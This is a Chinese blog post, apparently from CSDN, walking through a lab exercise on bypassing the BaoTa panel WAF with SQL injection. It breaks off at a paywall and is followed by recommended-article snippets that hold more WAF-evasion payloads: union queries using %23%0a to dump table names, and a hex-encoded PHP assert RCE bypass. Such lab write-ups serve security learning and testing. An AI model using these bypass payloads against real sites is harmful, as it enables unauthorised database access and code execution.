WAF - SQL注入绕过宝塔 靶场实战

最新推荐文章于 2025-06-30 15:35:43 发布
原创 最新推荐文章于 2025-06-30 15:35:43 发布 · 7.4k 阅读 · 46 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #mysql #sql

实验介绍

宝塔面板是广东堡塔安全技术有限公司研发的服务器管理工具,是一家专门从事服务器相关软件及服务研发的公司,宝塔的愿景就是让使用者更简便的使用服务器。宝塔面板是一款服务器管理软件,支持windows和linux系统,可以通过Web端轻松管理服务器,提升运维效率。例如:创建管理网站、FTP、数据库,拥有可视化文件管理器,可视化软件管理器,可视化CPU、内存、流量监控图表,计划任务等功能。

宝塔面板拥有网站的防护功能,可以防止sql注入,挂马,cc攻击等网站入侵的功能

 

实验目的

1.掌握sql注入绕过宝塔技巧

2.了解宝塔面板过滤方式

 

实验开始

第一步:

首先我们测试注入点,结果如下图所示

1 or 1=1    拦截               1 and 1=1   拦截             1 || 1=1        拦截

 

第二步:

id=1 %26%26 1=1   通过

在这里我们使用&&替换and关键字来做判断,在SQL语法中&&等价于and关键字,然后利用URL编码对关键字内容&&url编码,怕和传递多个参数的&字符冲突,&字符编码后对应为%26,我们发现可以通过此方法绕过

接着我们继续尝试

 

第三步:

1 && (select 1)=1 && 1=1  拦截

 

第四步:

1 && ( select 1)=1 && 1=1   通过

猜测可能匹配到了SQL语句中携带select关键字,符合拦截规则而被拦截,在select前面

最低0.47元/天 解锁文章

新学期VIP享超值加赠
sql注入绕过宝塔+安全狗+云锁
m0_55563900的博客
04-05 2296
1,判断闭合方式:id=1") --+ 2,判断列数:id=1") order%23%0aby 3–+ 3,获得当前数据库下所有表名 -1") union%23%0aall select 1,database(%23%0a),group_concat(table_name) from %23%0ainformation_schema.tables%23%0awhere%23%0atable_schema=database(%23%0a)–+ 4,获得指定表的所有列名 -1") union%23%0aall
记一次SQL注入绕过宝塔+云waf
2301_80115097的博客
12-27 751
发现这两个没有回应真实ip,就去看看用fofa或者hunter来在真实ip,hunter上面显示183是云厂商肯定是云waf,不能用这个ip。首先判断出字符型的话,就得去测试’||||’ ‘or+or’的语句,但是我发现他这里只要是在两个or之间出现东西,就一定会触发宝塔waf。看看这函数怎么搞的,把里面的语句替换成1,看看哪里出了问题,发包,发现他这个1直接爆出来了。既然这函数可以用,那我们就开始构造语句试试,正常的语句用不了,那我们就玩点不正常的。哟西,果然能行,出库名了,成功绕过waf
宝塔面板的sql注入绕过
weixin_48421613的博客
03-24 9024
一次宝塔sql注入绕过宝塔防护sql注入尝试联合查询的尝试布尔盲注尝试真假盲注运用 宝塔防护 在一次挖cvnd漏洞的时候,遇到了宝塔面板的防护,此waf屏蔽了传统的注释符“–+”、"#"、 “/*” , union select 做了防护而且似乎还做了过滤,废了半天劲绕过去发现联合查询不能被执行了,order by 虽然能用但是也没了卵用,搞了半天搞了个寂寞,正当我就要放弃的时候,我想起了使用布尔盲注,结果…玛德法克… sql注入尝试 老生常谈了哈,日站第一步当然需要确定是不是真的存在sql注入 输入单
文件上传绕过WAF:雷池、宝塔、安全狗技巧
最新发布
wcl20010的博客
06-30 1251
WAF会检查上传文件的MIME类型(Content-Type)和文件扩展名,判断是否为可执行文件或恶意文件类型。例如,阻止上传.php.jsp.asp等脚本文件。WAF会对上传文件的内容进行深度分析,通过特征码匹配、沙箱分析等方式,检测文件中是否包含恶意代码(如WebShell特征码)。WAF会检查文件名是否包含特殊字符、双扩展名等异常情况,以防止攻击者通过文件名混淆绕过检测。WAF会分析HTTP请求包的结构,特别是部分的和boundary等字段,确保其符合HTTP协议规范,防止畸形请求绕过
利用宝塔搭建SQL注入网站
Marsper的博客
09-09 1057
centos搭建宝塔 一、打开centos系统虚拟机,输入 ip addr获得IP地址。 (没有centos系统虚拟机的,需要先安装好系统。) 自取centos安装教程 二、打开xshell6新建会话,填入IP地址连接 连接成功后会显示绿色点点 接着安装宝塔面板(装过可跳过) 安装命令:yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh
WAF - SQL注入绕过安全狗靶场实战
weixin_54771278的博客
05-26 756
WAF - SQL注入绕过安全狗靶场实战 实验介绍 安全狗,互联网安全品牌,云安全服务与解决方案提供商 。 企业用户遍布互联网金融、电商、游戏、移动互联网、政府单位等多个行业。 网站安全狗 : 面向网站安全,包括:网马扫描及查杀(自有引擎,只针对网页木马);网马主动防御功能(可主动拦截网马上传和访问的动作);防SQL注入功能、防XSS跨站攻击功能;防盗链防下载;以及防止CC攻...
WAF - SQL注入绕过云锁 靶场实战
weixin_54771278的博客
05-29 2820
实验介绍 云锁是基于操作系统内核加固技术的免费服务器安全管理软件,由国内信息安全厂商椒图科技自主研发,凝结操作系统内核加固领域数十年的经验积累,集合服务器安全、网站安全管理为一体,以操作系统内核加固技术为基础,同时开放网站安全防护、登录防护、流量防护、资源监控、系统优化、安全日志6大功能模块,有效抵御CC、SQL注入、XSS病毒、木马、webshell等黑客攻击,为广大服务器管理员打造高效、可靠、便捷的服务器安全管理方案。 传统的安全防御手段大多基于网络层或者应用层,如防火墙、IDS、杀毒软件等等,..
宝塔最新未授权访问漏洞及sql注入
m0_52514790的博客
02-23 2205
整个宝塔 WAF 核心防护功能的代码写的确实有点粗糙,代码组织方式不像一个成熟软件该有的架构,小 Bug 一眼望不到头,今天分享的是一个未授权访问漏洞,普通用户可以无视宝塔的随机登录地址,无视宝塔的登录密码,直接操作后台的数据,实现人人都是管理员的效果。这段代码位于 /cloud_waf/nginx/conf.d/waf/public/waf_route.lua 文件中,源文件是 luajit 编译后的内容,反编译一下即可看到源码。话说这是临时工写的代码吧,对于宝塔的配置来说,要满足这两个条件很难吗?
SQL注入绕过WAF
qq_66291050的博客
05-27 452
14400and*/ 1=1,也行,内联注入14400是版本号,大于或等于这个版本号是有意义的,否则没有用。迪总这时候CTRL C+V搞的注入语句,特殊符号是URL编码的,但是迪总把编码还原了之后我们可以发现是被拦截了的,这还是一个玄学问题,哈。根据迪总的说法是宝塔,之类的,比较难,要一步一个脚印,先吃下酒菜,那就是安全狗,先把简单的绕过,困难的就慢慢来。/***/这么写,安全狗是不会对其检测的,不理解的话,我们来看看MYSQL数据库中是怎么理解这段语句的。很成功的绕过了,是吧,那么显存位是1,2,3。
网络安全最新深入waf绕过 (云盾,宝塔,安全狗)(19)(1)
2401_84254364的博客
05-04 918
说明现在这个也不行了,开始会对里面的内容进行检测。第四种 爬虫白名单。
深入waf绕过 (云盾,宝塔,安全狗)(19(2)
2401_84297035的博客
04-29 493
第二种方法我们是说这个IP地址是通过上面形式获取,在数据包里面,但是要看数据包里面waf的接受方式,因为在这个实战情况下面,他有可能接受你的IP地址是从网络层(tcp/ip)层面接受,如果这个层次数据库修改是不会接受的,意义不大,条件实在是太多,从请求来的数据包里面添加上面这五类。第二种方式 静态资源现在一些waf对这个有干扰,但不排除一些新的waf或者在比赛的时候自己创建的waf可能存在这样的绕过方式什么是静态我们举个例子,那本地靶场网站看看。
WAF绕过神器
12-14
顾名思义,铁鹰所创建的一款WAF绕过神器1.0版本。。。
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
渗透测试waf绕过基础
qi_SJQ_的博客
01-28 4144
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
SQL靶场练习之二(空格绕过、报错注入
Lorezon的博客
01-16 811
空格绕过 初始页面是这样的: 0x00判断是否存在注入 在name后面加个单引号,发现页面返回异常: 判断存在注入。 0x02常规拼接 name’ and 1=1 返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23 页面返回正常,说明绕过成功。 0x03判断字段 name’/**/order/**/by/*...
sqlmap 使用tamper脚本绕过WAF
xf3401837266的博客
05-22 2071
sqlmap 使用tamper脚本绕过WAF
WAF - SQL注入绕过ngx_lua_waf 靶场实战
weixin_54771278的博客
05-29 845
实验介绍 ngx_lua_waf是一个基于lua-nginx-module(openresty)的web应用防火墙 ,代码很简单,开发初衷主要 是使用简单,高性能和轻量级 实验目的 1. 掌握sql注入绕过ngx_lua_waf的方法与技巧 2. 了解 ngx_lua_waf 过滤方式 靶场环境 LNMP一键安装包+ngx_lua_waf sqli-labs-master靶场+waf 实验步骤 第一步: 我们先来判断注入点 1' and 1=1 --+...
RCE绕过宝塔WAF(php)
weixin_43916797的博客
07-11 1441
1.参数bin2hex加密,例如phpinfo(): 编写脚本得到加密后的数据:706870696e666f28293b <?php $str = "phpinfo();"; $hex = bin2hex($str); echo($hex) ?> url的参数为:www.xx.com?x=hex=′706870696e666f28293b′;assert(pack("H∗",hex='706870696e666f28293b';assert(pack("H*",hex=′706870696e6
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值